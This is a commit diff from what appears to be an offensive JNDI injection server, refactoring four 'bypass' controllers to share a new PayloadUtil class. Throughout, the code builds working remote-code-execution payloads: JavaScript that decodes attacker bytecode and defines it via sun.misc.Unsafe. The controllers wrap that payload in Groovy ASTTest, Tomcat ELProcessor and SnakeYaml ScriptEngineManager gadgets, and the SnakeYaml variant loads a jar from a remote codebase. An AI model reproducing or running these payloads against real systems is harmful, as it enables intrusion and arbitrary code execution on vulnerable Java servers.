refactor: 增加 PayloadUtil 工具类

增加 PayloadUtil 工具类, 优化 JavaScript payload 获取逻辑

src/main/java/map/jndi/controller/bypass/GroovyClassLoaderController.java

@@ -3,10 +3,10 @@
 import map.jndi.annotation.JNDIController;
 import map.jndi.annotation.JNDIMapping;
 import map.jndi.controller.BasicController;
+import map.jndi.util.PayloadUtil;
 import org.apache.naming.ResourceRef;
 
 import javax.naming.StringRefAddr;
-import java.util.Base64;
 
 @JNDIController
 @JNDIMapping("/GroovyClassLoader")
@@ -15,18 +15,7 @@ public class GroovyClassLoaderController extends BasicController {
     public Object process(byte[] byteCode) {
         System.out.println("[Reference] Factory: BeanFactory + GroovyClassLoader");
 
-        String code = "var s = '" + Base64.getEncoder().encodeToString(byteCode) + "';" +
-                "var bt;" +
-                "try {" +
-                "bt = java.lang.Class.forName('sun.misc.BASE64Decoder').newInstance().decodeBuffer(s);" +
-                "} catch (e) {" +
-                "bt = java.util.Base64.getDecoder().decode(s);" +
-                "}" +
-                "var theUnsafeField = java.lang.Class.forName('sun.misc.Unsafe').getDeclaredField('theUnsafe');" +
-                "theUnsafeField.setAccessible(true);" +
-                "unsafe = theUnsafeField.get(null);" +
-                "unsafe.defineAnonymousClass(java.lang.Class.forName('java.lang.Class'), bt, null).newInstance();";
-
+        String code = PayloadUtil.getJavaScriptPayload(byteCode);
         String script = "@groovy.transform.ASTTest(value={\n" +
                 "    assert Class.forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"" + code + "\")\n" +
                 "})\n" +

src/main/java/map/jndi/controller/bypass/GroovyShellController.java

@@ -3,10 +3,10 @@
 import map.jndi.annotation.JNDIController;
 import map.jndi.annotation.JNDIMapping;
 import map.jndi.controller.BasicController;
+import map.jndi.util.PayloadUtil;
 import org.apache.naming.ResourceRef;
 
 import javax.naming.StringRefAddr;
-import java.util.Base64;
 
 @JNDIController
 @JNDIMapping("/GroovyShell")
@@ -15,18 +15,7 @@ public class GroovyShellController extends BasicController {
     public Object process(byte[] byteCode) {
         System.out.println("[Reference] Factory: BeanFactory + GroovyShell");
 
-        String code = "var s = '" + Base64.getEncoder().encodeToString(byteCode) + "';" +
-                "var bt;" +
-                "try {" +
-                "bt = java.lang.Class.forName('sun.misc.BASE64Decoder').newInstance().decodeBuffer(s);" +
-                "} catch (e) {" +
-                "bt = java.util.Base64.getDecoder().decode(s);" +
-                "}" +
-                "var theUnsafeField = java.lang.Class.forName('sun.misc.Unsafe').getDeclaredField('theUnsafe');" +
-                "theUnsafeField.setAccessible(true);" +
-                "unsafe = theUnsafeField.get(null);" +
-                "unsafe.defineAnonymousClass(java.lang.Class.forName('java.lang.Class'), bt, null).newInstance();";
-
+        String code = PayloadUtil.getJavaScriptPayload(byteCode);
         String script = "Class.forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"" + code + "\");";
 
         ResourceRef ref = new ResourceRef("groovy.lang.GroovyShell", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);

src/main/java/map/jndi/controller/bypass/SnakeYamlController.java

@@ -8,14 +8,14 @@
 import map.jndi.template.ScriptEngineFactoryTemplate;
 import map.jndi.util.JarUtil;
 import map.jndi.util.MiscUtil;
+import map.jndi.util.PayloadUtil;
 import map.jndi.util.ReflectUtil;
 import javassist.ClassPool;
 import javassist.CtClass;
 import javassist.CtField;
 import org.apache.naming.ResourceRef;
 
 import javax.naming.StringRefAddr;
-import java.util.Base64;
 
 @JNDIController
 @JNDIMapping("/SnakeYaml")
@@ -27,18 +27,7 @@ public Object process(byte[] byteCode) {
         String factoryClassName = MiscUtil.getRandStr(12);
         String jarName = MiscUtil.getRandStr(12);
 
-        String code = "var s = '" + Base64.getEncoder().encodeToString(byteCode) + "';" +
-                "var bt;" +
-                "try {" +
-                "bt = java.lang.Class.forName('sun.misc.BASE64Decoder').newInstance().decodeBuffer(s);" +
-                "} catch (e) {" +
-                "bt = java.util.Base64.getDecoder().decode(s);" +
-                "}" +
-                "var theUnsafeField = java.lang.Class.forName('sun.misc.Unsafe').getDeclaredField('theUnsafe');" +
-                "theUnsafeField.setAccessible(true);" +
-                "unsafe = theUnsafeField.get(null);" +
-                "unsafe.defineAnonymousClass(java.lang.Class.forName('java.lang.Class'), bt, null).newInstance();";
-
+        String code = PayloadUtil.getJavaScriptPayload(byteCode);
         String yaml = "!!javax.script.ScriptEngineManager [\n" +
                 "  !!java.net.URLClassLoader [[\n" +
                 "    !!java.net.URL [\"" + Config.codebase + jarName + ".jar" + "\"]\n" +

src/main/java/map/jndi/controller/bypass/TomcatBypassController.java

@@ -3,10 +3,10 @@
 import map.jndi.annotation.JNDIController;
 import map.jndi.annotation.JNDIMapping;
 import map.jndi.controller.BasicController;
+import map.jndi.util.PayloadUtil;
 import org.apache.naming.ResourceRef;
 
 import javax.naming.StringRefAddr;
-import java.util.Base64;
 
 @JNDIController
 @JNDIMapping("/TomcatBypass")
@@ -15,17 +15,7 @@ public class TomcatBypassController extends BasicController {
     public Object process(byte[] byteCode) {
         System.out.println("[Reference] Factory: BeanFactory + ELProcessor");
 
-        String code = "var s = '" + Base64.getEncoder().encodeToString(byteCode) + "';" +
-                "var bt;" +
-                "try {" +
-                "bt = java.lang.Class.forName('sun.misc.BASE64Decoder').newInstance().decodeBuffer(s);" +
-                "} catch (e) {" +
-                "bt = java.util.Base64.getDecoder().decode(s);" +
-                "}" +
-                "var theUnsafeField = java.lang.Class.forName('sun.misc.Unsafe').getDeclaredField('theUnsafe');" +
-                "theUnsafeField.setAccessible(true);" +
-                "unsafe = theUnsafeField.get(null);" +
-                "unsafe.defineAnonymousClass(java.lang.Class.forName('java.lang.Class'), bt, null).newInstance();";
+        String code = PayloadUtil.getJavaScriptPayload(byteCode);
 
         ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);
         ref.add(new StringRefAddr("forceString", "x=eval"));

src/main/java/map/jndi/util/PayloadUtil.java

@@ -0,0 +1,20 @@
+package map.jndi.util;
+
+import java.util.Base64;
+
+public class PayloadUtil {
+    public static String getJavaScriptPayload(byte[] byteCode) {
+        String code = "var s = '" + Base64.getEncoder().encodeToString(byteCode) + "';" +
+                "var bt;" +
+                "try {" +
+                "bt = java.lang.Class.forName('sun.misc.BASE64Decoder').newInstance().decodeBuffer(s);" +
+                "} catch (e) {" +
+                "bt = java.util.Base64.getDecoder().decode(s);" +
+                "}" +
+                "var theUnsafeField = java.lang.Class.forName('sun.misc.Unsafe').getDeclaredField('theUnsafe');" +
+                "theUnsafeField.setAccessible(true);" +
+                "unsafe = theUnsafeField.get(null);" +
+                "unsafe.defineAnonymousClass(java.lang.Class.forName('java.lang.Class'), bt, null).newInstance();";
+        return code;
+    }
+}